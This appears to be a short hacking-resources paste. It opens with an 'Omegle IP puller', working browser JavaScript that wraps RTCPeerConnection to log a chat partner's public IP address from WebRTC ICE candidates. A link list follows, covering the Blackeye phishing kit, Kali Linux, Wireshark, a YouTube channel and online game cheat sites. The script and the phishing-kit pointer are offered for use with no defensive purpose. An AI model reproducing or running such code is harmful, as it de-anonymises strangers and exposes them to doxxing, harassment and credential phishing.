Omegle IP puller:
window.oRTCPeerconnection = window.oRTCPeerConnection || window.RTCPeerConnection
window.RTCPeerConnection = function(...args) {
const pc = new window.oRTCPeerconnection(...args)
pc.oaddIceCandidate = pc.addIceCandidate
pc.addIceCandidate = function(iceCandidate, ...rest) {
const fields = iceCandidate.candidate.split(' ')
if (fields[7] === 'srflx') {
console.log('IP Address:', fields[4])
}
return pc.oaddIceCandidate(iceCandidate, ...rest)
}
return pc
}
Blackeye: https://github.com/x3rz/blackeye
Kali Linux: https://www.kali.org/downloads/
Wireshark: https://www.wireshark.org/
Network Chuck: https://www.youtube.com/channel/UC9x0AN7BWHpCDHSm9NiJFJQ
Krunker Dogeware: https://dogeware.cheems.art
Surviv.io Hacks: https://icehacks.github.io